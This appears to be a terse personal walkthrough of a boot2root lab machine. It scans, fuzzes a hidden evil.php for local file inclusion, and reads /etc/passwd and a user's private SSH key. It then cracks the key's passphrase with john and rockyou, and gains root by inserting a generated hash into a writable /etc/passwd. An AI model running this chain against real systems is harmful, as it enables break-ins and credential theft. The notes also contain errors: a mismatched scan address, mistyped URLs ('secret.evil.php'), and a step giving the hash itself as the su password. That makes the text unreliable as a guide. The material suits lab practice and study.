1. NMAP 10.10.20.0/24

    Results: 10.10.20.50
            

2. dirb http://10.10.30.61 

    Results (4): 
            http://10.10.20.50/index.html
            http://10.10.20.50/robots.txt     (hello H4x0r)
            http://10.10.20.50/secret
            http://10.10.20.50/secret/index.html

3. dirb http://10.10.20.50/secret

    Results: http://10.10.20.50/secret/index.html

4. dirbuster

    http:10.10.20.50/secret/
    directory-list-lowercase-2.3-medium.txt

    Results: /secret/evil.php

5. ffuf

    ffuf -u http://10.10.20.50/secret/evil.php?FUZZ=/etc/passwd -w directory-list-2.3-small.txt -fs 0

5. URL

    http://10.10.20.50/secret.evil.php?FUZZ=/etc/passwd

    user: mowree

6. password

    http://10.10.20.50/secret.evil.php?FUZZ=/home/mowree/.ssh/id_rsa

    wget http://10.10.20.50/secret.evil.php?FUZZ=/home/mowree/.ssh/id_rsa -O key

7. chmod "key"

    chmod 600 key

8. ssh2john

    ssh2john key > key.hash

9. crack key.hash

    john key.hash --wordlist=rockyou.txt

    passphrase: unicorn

10. ssh into server

    ssh -i key mowree@10.10.20.50

    passphrase: unicorn

11. cat user.txt

    results: 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

12. Gain root access

    cd /etc

    cat passwd

13. Create hashed password for root

    openssl passwd david

    results: $1$rdZX6iW5$Z0yApTP7256tc37Gx0vYU/

14. Paste hashed password in "passwd" for root

    nano /etc/passwd

    ex.         :root:x:0:0:root:/root:/usr/bin/zsh

    new         :root:$1$rdZX6iW5$Z0yApTP7256tc37Gx0vYU/:0:0:root:/root:/usr/bin/zsh

15. Log in as Root

    su

    password: $1$rdZX6iW5$Z0yApTP7256tc37Gx0vYU/

16. Get Root Flag

    cat root.txt

    flag= 36QtXfdJWvdC0VavlPIApUbDlqTsBM


